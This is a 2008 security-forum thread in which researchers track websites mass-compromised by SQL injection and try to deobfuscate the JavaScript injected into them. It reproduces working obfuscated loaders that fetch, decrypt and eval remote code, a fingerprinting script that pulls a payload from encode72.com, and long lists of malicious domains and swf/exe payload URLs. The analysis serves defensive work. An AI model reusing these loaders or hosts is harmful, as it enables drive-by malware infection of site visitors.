1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se41%se63%se78KQ%1%se6%6Tse76%se65%se58%se4F%se62%se6A%se65%se63%se78KQ%1%se28%se6E%se4F%se58KQ%1%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se7D';eval(unescape(cB.replace(/8KQ%/g,'b').replace(/%6T/g,'9%').replace(/b1%/g,'4%').replace(/%se/g,'%')));var nY=unescape(LV);if (!q){try{q=new ActiveXObject(nY);}catch(e){q=null}}var zqj=iGUR;var akK=function(){tP = unescape(q.responseText);var W5O=0;var Qg6M='Cc%76Cc%61Cc%7Z20Cc%74Cc%6ECc%37Cc%3BCc%66Cc%6FCc%7Z2r3H6BCc%74Cc%7ACc%4FCc%3DCc%30Cc%3BCc%6BCc%74Cc%7ACc%4FCc%3CCc%3Z35Cc%36Cc%3BCc%6BCc%74Cc%7ACc%4FCc%2BCc%2BCc%29Cc%7BCc%74Cc%6ECc%37Cc%3DCc%6BCc%74Cc%7ACc%4FCc%25Cc%4Z2ECc%6CCc%65Cc%6ECc%67Cc%74Cc%6r3H3BCc%74Cc%6ECc%37Cc%3DCc%4Z2ECc%63Cc%6r3H61Cc%7Z43Cc%6FCc%64Cc%65Cc%41Cc%74Cc%2r3H74Cc%6ECc%37Cc%29Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%2BCc%74Cc%6ECc%37Cc%3BCc%74Cc%6ECc%37Cc%3DCc%57Cc%35Cc%4FCc%2BCc%74Cc%6ECc%37Cc%3BCc%57Cc%35Cc%4FCc%3DCc%74Cc%6ECc%37Cc%20Cc%25Cc%20Cc%3Z35Cc%36Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3DCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3DCc%74Cc%6ECc%37Cc%3BCc%7DCc%5Z57Cc%6FCc%3DCc%30Cc%3B';eval(unescape(Qg6M.replace(/Cc%/g,'%').replace(/Z/g,'2%').replace(/r3H/g,'8%')));var V3LR='MZ68MZ42MZ49MZ73MZ3DMZ30MZ3BMZ76MZ61MZ72MZ20MZ53MZ58MZ3DMZ27MZ27MZ3B';eval(unescape(V3LR.replace(/Z/g,'m').replace(/Mm/g,'%')));var x6;var Ak;for(x6=0;x6<tP.length;x6++){RWo=RWo+1;RWo=RWo%256;hBIs=hBIs+nPG[RWo];hBIs=hBIs%256;tn7=nPG[RWo];nPG[RWo]=nPG[hBIs];nPG[hBIs]=tn7;Ak=nPG[RWo]+nPG[hBIs];Ak=Ak%256;Ak=nPG[Ak];Ak=tP.charCodeAt(x6)^Ak;SX+=String.fromCharCode(Ak);}eval(SX);};var x=function(){if((q.readyState==4)&&(q.status==200)){akK();}};q.onreadystatechange=x;q.open('GET',zqj,true);q.send(null);
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 12:53:57 pm
Yancy=Mike?

mike@shadowserver.org -- yup, that's me

Quote
http://www.malwaredomainlist.com/forums/index.php?topic=1867.0

Need adding?

I've been trying to stick to script=src methods, rather than iframes.  It's more difficult to tell whether or not the iframes are mass injections or not.  I've yet to run across what looks like injected jscript that turns out to not be a mass injection.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 02:26:38 pm
New additions:
hxxp://www.xiaobaishan.net
hxxp://www.rexec39.com
hxxp://www.tlcn.net
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 02, 2008, 09:38:56 pm
Thank you :)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 03, 2008, 03:29:47 pm
Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 03, 2008, 11:40:15 pm
There is a script here which may be malicious. Don't know much about it, for all I know it could be clean but looks heavily obfuscated mgfcompressors.com/iieox.js
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 03, 2008, 11:44:31 pm
I'm getting a 404 for that one?
Title: Re: SQL Injected jscript sites
Post by: Orac on June 04, 2008, 11:32:17 am
Steve iam also getting a 404 from that link. Wonder if its been cleaned, or they just dont like British IPs lol
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 11:55:29 am
It changes the name of the file. It is yzuac.js at the moment
If you visit the link for the 2nd time - the page will be clear, no references to the JS file will be there.

The script is d*mn complicated.
I'll give it at try, and I'll post the results (if I get any)
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 12:32:34 pm
I didn't got far. the script try to define a function in the way that isn't working in SpiderMonkey

If someone want to try it in IE under Virtual Machine, here is the code I got:
Code: [Select]
var arg="btryttfi";
function Cwmf8K(AH){var zoU5="C68KC3";var U47="var FuqV=75397;";var Pk="qeJ33cqe3";var zOR="8N0G8";var Jz="9G8N0G850";var vV="charCodeA";var pK="901;var xEx=1";Jz+="G85DG83DG84";var ySE="nLej-40955883";var j6="e3Dcqe31";var eBBT="scape(U.replac";var u1oP="Z2Yh;n";var sz=")));var oGZ";var r="qeEl1";var Bi="q6KC3BKCUeqAK";zOR+="50G85DG8";var X="change=G;Y";var UqE="Txc+=String.fro";var EwzG="6c-857";var mkj="G84CG83DG843G";var i7=";var xC=711";var Q1="2daR20d";var BAZz="(/f/g,'A').re";var ZhM5="L=new Activ";var RkYD="L=nul";var oie="(/cqe/";var MU3=");D=xC%nLe";var pjJt="5DG83BG843G";var MCSe="6F9D%g12";var tSPH=");mi+";var CN="0%g125%g120";var RF="ace(/Ueq/g";var gstw="ape(De.rep";ySE+="84);F";var KZP="var YL=null;va";var gh="l=unescape(";var VyU="61G8N2G84";var lJ="o/g,'%'";var em9="KC6UeqK";var cy0="2G86FG86DG843G";var iB="0dSmi460dSmi750";var X1Vn="KC76KC61";var SN="ace(/9/g,";var KO="(/G8/g,'%')))";zOR+="3BG845G850G845G";var uf="86DG86DG84CG8";var XjNy="g136%g13B9A%g";var UK="%4C%48%54%54%";SN+="'%5')));}qIpP=";var n8vF="e(/\\W/g,'');";uf+="3DG84FG8N9G82";var ClN8="ce(/M1/g,'%";var mNf="%g143%g1769";pjJt+="8N6G851G85B";var GC="r YH=function()";var rK="KC61KC";var y="3D%g143%g1769";var kwC="g148%g165%g176%";var hsR="4D%4C";KO+=";}eva";cy0+="868G8";var EbF="String";rK="C78KC43KC3BKC76"+rK;var rK2u="g,'D')));FuqV=";var aSn5="33Fpo34F";var t="N0G850G85DG82";var TfU="DFpo3BFpo76";var Dd="KC76KC61KC7";var V9sI="tring.fro";MU3="v-59581"+MU3;var c="2B9A%g148";MU3=EwzG+"5844471)*(v"+MU3;var g="XObject(z";g+="zl);}";var pMu="cape(z2l";var dg="i.charCodeA";var Usbs="L.sen";kwC+="g13D%g143%g1";lJ+=")));Z2Yh=Z2";var WDIF="L=null}}v";var ERL4="mi/g,'%')));";Bi+="C32KCUeq9KC68KC";var rq="cqe72cqe2Vc";hsR+="%48%54%54%50';i";pK+="8390;Pv6";ClN8=",'M').repla"+ClN8;var Lm="69%63%72%6F%73%";TfU="po56Fpo2DFpo2"+TfU;mNf="%g13B"+mNf;var uT="pe(Cpw)";var KJKW="replace(/aR/";var mw="a++){CvQ[UE";var kIc="ngth;oGZI";var SsV="0G845G";var kzg="3B';eval(un";var DY="3BG85AG848G";KO+="l(q);};var G=";n8vF="eplac"+n8vF;var Eo="o4CFpo3B';ev";var g76O="qeJEl3cqe3Dc";var j=");uA=183;}}";gh+="it);if ";RkYD="();}catch(e){Y"+RkYD;var yCa="').replace(/El";var h6Sm="3B9894%g13D9A%g";var SNT="dSmi75";var sh="9D%g13B%g143%";var uK8="2Fpo20Fpo";uT="r ejA=unesca"+uT;Pk=j6+"cqe3c"+Pk;var Esh="2G84CG8";var XeN="G85DG83BG";BAZz=pMu+"P.replace"+BAZz;gstw="eval(unesc"+gstw;Dd="n0KC78KC43KC3B"+Dd;var Cxt1="qeEl1cq";ySE+="uqV=FuqV%"+u1oP;var FBk="DG86DG";var pk="place(/B%/g";var J2="nseText);var X";gh+="(!YL){try";var bAg="5BG845G850G8";var J="849G8N0G850G";UK="%32%2E%58%4D"+UK;FBk="852G86"+FBk;VyU+="3G86FG86";h6Sm+="148%g165%g1";RkYD="tpRequest"+RkYD;Q1="daR6B%daR7"+Q1;var tW8J="dSmixigY";KJKW="unescape(BUBC."+KJKW;mNf+="19B98949D%g13D9";var UkqY="051;var Mkm";KO="g,'7').replace"+KO;t="85BG8N1G849G8"+t;var dl9o="0G845G";FBk="DG86DG84CG83DG"+FBk;J="G8N1G"+J;var Af="84CG8";var nr="mmL;for(RbLR=0;";FBk+="84CG825G";UK+="50';var";i7+="63;var EjFO='KC";var PLZK="po72Fp";var REQt=";Go<256;Go+";V9sI="){Txc+=S"+V9sI;var DAJC="dSmi760dSmi3D0d";PLZK+="o20Fpo72Fpo7AF";var mtJB="850G845G8";dg="ngth;ZHev=m"+dg;gstw="CG829G83B';"+gstw;var w6="qe5cqeJ3DcqeE";var xXpp="YL.onrea";U47+="var Z2Y";Q1="30daR3BdaR76"+Q1;DAJC="640dSmi6A0"+DAJC;vV=kIc+"++){uA^=mi."+vV;w6="3cqe59cqeEl1c"+w6;TfU="Fpo75Fpo71F"+TfU;var CKCG="80606";c="9894%g1"+c;var tY9Q="();var UEma";var KJGB="65%g176%g13D%g1";Eo="BFpo4BFp"+Eo;var Lw="Fpo27";var bZx="3DG843G8N6G851G";var Rk7k="UeqKC37KC3";Bi="KC7UeqKC71KCUe"+Bi;Cxt1="e7Elc"+Cxt1;var NJZE="ect(ejA";var AB="52G86DG86";UK="D%73%78%6D%6C"+UK;ClN8+="').repl"+SN;var H="C37KC37KC32K";Dd+="2KC20KC76KC76KC";V9sI+="mCharCode";KJGB+="43%g176919";y="g147%g16F9D%g1"+y;ERL4+="CvQ=new Array"+tY9Q;pk+=",'1').replac";Usbs=",IOom,true);Y"+Usbs;FBk+="832G8";em9+="C6AKC3Vn0";var yjZN="UeqAKC32KCUeq9";dg="%mi.le"+dg;UqE="(oGZI%76==75){"+UqE;var OcK="){if((YL";var T7="6EKC4CKC6U";var okr="9KC3UeqKC3";var ojT8="KC4CKC3Vn0KC33K";rK+="72KC20KC6EKC4CK";NJZE=ZhM5+"eXObj"+NJZE;Af+="3BG8N1G82B";i7+="UeqAKC32KCUeq9K"+zoU5;var ixL="){YL=null}}";var Dt="86DG84CG83DG84";gh=WDIF+"ar zz"+gh;y=sh+"g176919B%"+y;XeN+="843G8N6G851G";var Ip="G869G86EG86N";t+="BG843G8N6G851G8"+bAg;H+="C3UeqKC3B"+X1Vn;PLZK+="po31Fpo3DFpo3";XeN="45G850G845"+XeN;SsV="845G85"+SsV;ixL+="var IOo";gh+="{YL=new ";dg=REQt+"+){ZHev=Go"+dg;g=gh+"Active"+g;Eo="DFpo44Fpo2"+Eo;DY+="865G8N6G8"+bZx;var dpL="851G85BG8N1";var jmh="KC6UeqKC6A";RF+=",'5').replace(";var Wy="i=arguments.";ixL+="m=SYaX;va"+GC;SNT="i3D0dSmi460"+SNT;KJKW="7daR3B';eval("+KJKW;var XgE="ace(/0dS/g,'";var qMc1="1G849";var euFA="th;nLej=nLej+xE";J2="(YL.respo"+J2;XeN="85BG8"+XeN;h6Sm=c+"%g165%g176%g1"+h6Sm;zOR+="83DG845G85"+dl9o;T7=rK+"C6UeqKC6AKC3BKC"+T7;Usbs+="d(null);";em9="6EKC4C"+em9;BAZz=Pk+"B';eval(unes"+BAZz;Af+="G83DG853G8";var LkCR="r ZHe";uT=RkYD+"l};}va"+uT;SsV="5G836G83BG"+SsV;uT="XMLHt"+uT;sz="lace(/%J/g,'8%'"+sz;mtJB+="5DG83DG85A";rq+="qe75cqe41cq"+BAZz;Af="DG86DG"+Af;gstw+="lace(/N/"+KO;ixL+="{Oy = unescape"+J2;DAJC="50dSmi"+DAJC;ySE="890)*("+ySE;ClN8+="0;var BUBC='d";okr=ojT8+"C30KC3"+okr;UkqY=rK2u+"FuqV+44"+UkqY;euFA=ySE+"Lej=rz1+D.leng"+euFA;kzg+="escape(Z3p.repl";Usbs=X+"L.open('GET'"+Usbs;gstw="52G86DG86DG84"+gstw;DAJC+="Smi410dS";yjZN+="KC68KC2AK"+T7;kwC+="76919B%";eBBT="g13B';eval(une"+eBBT;var Dda="%g148%g165%g176";Bi="68KC2BKC46"+Bi;var Ckds="dSmi7xigY0";ClN8+="aR45daR50daR4";uf+="EG863G868G8"+VyU;tSPH+="=FuqV;var";XgE="ig/g,'z').repl"+XgE;SsV="G825G832G83"+SsV;RF+="/KC/g,'%').";OcK=gstw+"function("+OcK;Wy=mw+"ma]=UEma;}m"+Wy;Ckds="0dSmi760dSmi610"+Ckds;iB+="dSmi710dSmi";dpL="G82BG843G8N6G"+dpL;var K="Fpo3BFpo4";Rk7k+="1KC30KC3BKC"+em9;UK+=" it='%4D%"+Lm;OcK+=".readySt";uK8=TfU+"Fpo61Fpo7"+uK8;FBk="852G86"+FBk;Af="G852G86"+Af;yCa=rq+"place(/V/g,'0"+yCa;MCSe=kwC+"g147%g1"+MCSe;MCSe+="B9A%g148%g165";sz=oie+"g,'%').rep"+sz;Wy="6;UEm"+Wy;i7+="Vn0KCUeqA";y=KJGB+"B%g147%g16F"+y;g76O="cqe7c"+g76O;Esh="G8N4G828G852G86"+Esh;n8vF=EbF+"();mi=mi.r"+n8vF;Rk7k=Dd+"3Vn0KC32KC3"+Rk7k;nr="var R"+nr;qMc1=DY+"85BG8N"+qMc1;XjNy+="148%g1"+y;MCSe="ar U='9A%"+MCSe;XjNy=CN+"%g132%g135%"+XjNy;Q1=ClN8+"5daR3DdaR"+Q1;yjZN=Bi+"3Vn0KC"+yjZN;t+="45G85DG83BG"+FBk;pk+="e(/dJ/g,'%'))";var VJ=";RbLR++){";KJKW="daR3DdaR27daR2"+KJKW;Eo+="al(unescape(Mkm";uK8=aSn5+"po36Fpo3BFpo46"+uK8;Dt="83BG852G86DG"+Dt;PLZK=UkqY+"o='Fpo76Fpo61F"+PLZK;dg=LkCR+"v;for(Go=0"+dg;eBBT+="e(/%g/g"+Q1;sz+="I;for(oG";yCa="cqe7ElcqeEl1"+yCa;VJ=nr+"RbLR<Oy.length"+VJ;UqE+="mCharCode(uA"+j;AB=mkj+"8N6G851G85BG8"+AB;XgE+="N').replace(";uT="){try{YL=new "+uT;yCa=g76O+"qe27cqe27cqe3B"+yCa;Ckds+="dSmixigY00dSmi6"+DAJC;J="ar De='"+J;pjJt+="G8N1G84"+Jz;Af+="N4G8N2"+Ip;yCa+="/g,'6').replace"+sz;XgE+="/xzY/g,'2').r";var aKIf="G86FG";var nnIR="UEma=";CKCG=lJ+"Yh%KL;var Pv6c="+CKCG;dg+="t(ZHev);v"+MCSe;hsR+="f (!YL"+uT;ERL4=XgE+"eplace(/N"+ERL4;t+="35G836G83";nnIR+="0;UEma<25"+Wy;MU3=euFA+"x;xC=(Pv"+MU3;Ckds=tW8J+"50dSmi440dSmi3B"+Ckds;okr+="2KC3B';ev";yjZN+="eqKC6AKC3V"+Rk7k;hsR+=";if (!YL){try{Y"+NJZE;H+="KC72KC20KC4B"+okr;kzg=Ckds+"mi480dSmi"+kzg;Esh=uf+"4G865G841"+Esh;RF="pe(EjFO.repl"+RF;ERL4+=";var ";Af+="G82EG866G8N"+cy0;uK8=PLZK+"3Fpo30Fpo"+uK8;w6+="l5cqeEl4c";yjZN+="KC6EKC4C"+jmh;xXpp+="dystate"+Usbs;SNT=iB+"560dSm"+SNT;AB+="DG84CG85DG8";vV+="t(oGZI);if"+UqE;CKCG="e(/Fp"+CKCG;SsV="G849G8N0G850"+SsV;qMc1="G835G836G8"+qMc1;KZP=V9sI+"(uA);}mi=Txc;"+KZP;dpL+="G849G"+zOR;CKCG+=";vv=vv+33"+pK;xXpp="{YH();}};"+xXpp;uK8="(/Vn0/"+uK8;w6=Cxt1+"e72cqe2Vcqe5"+w6;w6=tSPH+" z2lP='cq"+w6;ixL+="T=0;va"+dg;nnIR+="callee.to"+n8vF;nnIR+="mi=mi.toUppe";hsR="2E%58%"+hsR;eBBT="g176%"+eBBT;w6+="qeElfcqe7Elc";r+="cqe72cqe2Vcqe54"+yCa;Dda=ixL+"%g176%g13B9A"+Dda;kzg+="ace(/"+ERL4;AB=t+"BG852G86DG86D"+AB;K=Lw+"Fpo33Fpo35Fpo27"+K;nnIR+="rCase("+w6;VJ+="qIpP=qIpP+1;v"+J;Af+="61G8N2G843"+aKIf;Dda=g+"catch(e"+Dda;SsV+="83DG845G850G845"+dpL;RF+="replace"+uK8;MU3=CKCG+"c=(Pv6c-79"+MU3;pk=KJKW+"g,'J').re"+pk;MU3=Eo+"o.replac"+MU3;RF=H+"al(unesca"+RF;MU3=K+"4Fpo3"+MU3;UK=KZP+"r Cpw='%4"+UK;SNT=MU3+"j;var Z3p='"+SNT;mNf=XjNy+"19B98949D"+mNf;VJ+="83DG8N1"+SsV;SNT+="0dSmi710dSmi560"+kzg;Dda+="%g13D"+h6Sm;mtJB=XeN+"85BG845G"+mtJB;mtJB+="G848G865G8N6G"+Dt;RF+="44Fpo3D"+SNT;i7=U47+"h=73665"+i7;yjZN+="KC2AKC3UeqK"+RF;qMc1+="G8N0G850G8"+pjJt;pk=eBBT+"aR7B%"+pk;Esh+="52G829G85E"+Af;AB=mtJB+"3G8N6G851G"+AB;yjZN+="mi;for("+nnIR;AB=qMc1+"3G8N6G851G"+AB;pk+=");var RbLR;"+VJ;AB+="3BG852G"+Esh;xXpp=".status==200))"+xXpp;Dda+="76%g12"+mNf;hsR+=");}catch(e){Y"+Dda;OcK+="ate==4)&&(YL"+xXpp;i7+="KC32KCUeq9KC"+yjZN;hsR=UK+"6F%66%74%"+hsR;hsR+="A%g148%g165%"+pk;r=i7+"qe3Bcqe7Elc"+r;AB+="864G865G828G8"+OcK;hsR=vV+"if(oGZI%76!=75"+hsR;r+="ZI=0;oGZI<mi.le"+hsR;r+="825G832"+AB;eval(r);}Cwmf8K(arg);


Take a look at the first variable:
var arg="btryttfi";
The value of the variable is the name of the file on the server. It contains some data probably needed in the script.
After going through deobfuscation, i got till here:
Code: [Select]
var FuqV=75397;var Z2Yh=73665;var xC=71163;var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));FuqV=FuqV+44051;var Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';eval(unescape(Mkmo.replace(/Fpo/g,'%')));Z2Yh=Z2Yh%KL;var Pv6c=80606;vv=vv+33901;var xEx=18390;Pv6c=(Pv6c-79890)*(nLej-4095588384);FuqV=FuqV%Z2Yh;nLej=rz1+D.length;nLej=nLej+xEx;xC=(Pv6c-8575844471)*(vv-59581);D=xC%nLej;var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));CvQ=new Array();var UEma;var mi;for(UEma=0;UEma<256;UEma++){CvQ[UEma]=UEma;}mi=arguments.callee.toString();mi=mi.replace(/\W/g,'');mi=mi.toUpperCase();mi+=FuqV;var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));var oGZI;for(oGZI=0;oGZI<mi.length;oGZI++){uA^=mi.charCodeAt(oGZI);if(oGZI%76==75){Txc+=String.fromCharCode(uA);uA=183;}}if(oGZI%76!=75){Txc+=String.fromCharCode(uA);}mi=Txc;var YL=null;var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';if (!YL){try{YL=new XMLHttpRequest();}catch(e){YL=null};}var ejA=unescape(Cpw);if (!YL){try{YL=new ActiveXObject(ejA);}catch(e){YL=null}}var zzl=unescape(it);if (!YL){try{YL=new ActiveXObject(zzl);}catch(e){YL=null}}var IOom=SYaX;var YH=function(){Oy = unescape(YL.responseText);var XT=0;var ZHev;for(Go=0;Go<256;Go++){ZHev=Go%mi.length;ZHev=mi.charCodeAt(ZHev);var U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));}qIpP=0;var BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));var RbLR;var RmmL;for(RbLR=0;RbLR<Oy.length;RbLR++){qIpP=qIpP+1;var De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')));}eval(q);};var G=function(){if((YL.readyState==4)&&(YL.status==200)){YH();}};YL.onreadystatechange=G;YL.open('GET',IOom,true);YL.send(null);

JS Debuger says that AH is not defined. AH exists in obfuscated script, as the argument of the function.
After I put a value instead AH, I get to the wrong definition of mi
SpiderMonkey does not allow such declaration of mi function.
I have no idea how to get further from this step.
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 12:47:52 pm
Sorry I didn't asked for permission (my brain seems to be slower than my fingers), but I've posted the link to this malicious site on MWR forum.
If antnet can't deobfuscate it, then I do not know who can do it.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 04, 2008, 02:17:40 pm
New:
tjwh202.162.ns98.cn
nb88.cn
hxxp://www.exe94.com
hxxp://www.view89.com
hxxp://www.err68.com
hxxp://www.rundll841.com

Not injected, but related and definately malicious (several of the above injections reference it):
sslput4.com
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 02:58:08 pm
I did take a look at rundll841.com
It does take a look at the system language settings, and it downloads malware according to these:
Code: [Select]
document.UhbtQqzm = 1;
document.Z3p0uYay = 1;
document.MSDKhOrw = 1;
if (!document.F9kJY0Ud) {
var Nx3xniTR;
var ALFsRXKd = navigator.appMinorVersion;
var KDzpO8UG = -1
var aanTFP7g = "01";
while((KDzpO8UG = ALFsRXKd.indexOf(";SP", KDzpO8UG+1)) != -1) {
var QfTUqtJd = ALFsRXKd.charAt(KDzpO8UG+3);
if (QfTUqtJd == "1")
aanTFP7g = "02";
else if (QfTUqtJd == "2")
aanTFP7g = "03";
else if (QfTUqtJd == "3")
aanTFP7g = "04";
else if (QfTUqtJd == "4")
aanTFP7g = "05";
else if (QfTUqtJd == "5")
aanTFP7g = "06";
else if (QfTUqtJd == "6")
aanTFP7g = "07";
if (aanTFP7g != "01")
break;
}
if (aanTFP7g == "01" && ALFsRXKd.indexOf("Release Candidate", 0) != -1)
aanTFP7g = "08";
var QzmzTMai = navigator.systemLanguage.substr(0, 10);
var FEXGqg2V = "";
for(var GPzlxy9a=0;GPzlxy9a<QzmzTMai.length;GPzlxy9a++) {
QOu110FA = QzmzTMai.charCodeAt(GPzlxy9a).toString(16);
if (QOu110FA < 2)
FEXGqg2V += "0";
FEXGqg2V += QOu110FA;
}
while(FEXGqg2V.length < 20)
FEXGqg2V += "00";
var Nx3xniTR = aanTFP7g + FEXGqg2V;
var sIvWfaMT = document.createElement("script");
sIvWfaMT.setAttribute("type", "text/javascript");
sIvWfaMT.setAttribute("src", "http://encode72.com/cgi-bin/index.cgi?f7fbd8fc0100f0600077e0ed58060000000002bfbd906aff" + Nx3xniTR);
document.body.appendChild(sIvWfaMT);
}
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 04, 2008, 03:02:21 pm
Added:
hxxp://www.win496.com
hxxp://flyzhu.9966.org
hxxp://www.encode72.com
hxxp://www.exec51.com
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 04, 2008, 04:00:42 pm
Quote
hxxp://fourevent.cn/16.swf
It's the same lamer we've already seen before...
Quote
hxxp://user1.12-27.net/bak.css
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 04, 2008, 04:25:33 pm
Many swf-infected sites listed here as well...
(JohnC,here comes some extra work,lol!  :D )
http://ilion.blog47.fc2.com/blog-entry-46.html
http://ilion.blog47.fc2.com/blog-entry-47.html
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 04, 2008, 11:21:01 pm
Thanks :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 05, 2008, 02:08:01 pm
We're having some issues with our webserver at the moment, so these haven't been posted to the blog entry.

New:
hxxp://www.tag58.com
hxxp://www.sslput4.com (it's now being injected)
hxxp://www.sslnet72.com
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 05, 2008, 02:27:21 pm
Quote
We're having some issues with our webserver at the moment...
Tried a couple of hours ago and site wasn't accessible...but it seems like it's fixed now  :)
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 05, 2008, 03:41:57 pm
From Ilion's blog above...
Quote
hxxp://exe.wokaixin.com/exe/115.swf
hxxp://exe.wokaixin.com/exe/16.swf
hxxp://exe.wokaixin.com/exe/28.swf
hxxp://exe.wokaixin.com/exe/45.swf
hxxp://exe.wokaixin.com/exe/47.swf
hxxp://exe.wokaixin.com/exe/64.swf
hxxp://fourevent.cn/115.swf
hxxp://fourevent.cn/16.swf
hxxp://fourevent.cn/28.swf
hxxp://fourevent.cn/45.swf
hxxp://fourevent.cn/47.swf
hxxp://fourevent.cn/64.swf
hxxp://iphone003.com/swf/115.swf
hxxp://iphone003.com/swf/16.swf
hxxp://iphone003.com/swf/28.swf
hxxp://iphone003.com/swf/45.swf
hxxp://iphone003.com/swf/47.swf
hxxp://iphone003.com/swf/64.swf
hxxp://mmlan.com.cn/4561.swf
hxxp://mmlan.com.cn/4562.swf
hxxp://mmlan.com.cn/mm.exe
hxxp://mmpp.cqcx321.cn/ff.swf
hxxp://mmpp.cqcx321.cn/ie.swf
hxxp://soft666666.cn/115.swf
hxxp://soft666666.cn/16.swf
hxxp://soft666666.cn/28.swf
hxxp://soft666666.cn/45.swf
hxxp://soft666666.cn/47.swf
hxxp://soft666666.cn/64.swf
hxxp://www.abc998801.cn/web/1.swf
hxxp://www.abc998801.cn/web/2.swf
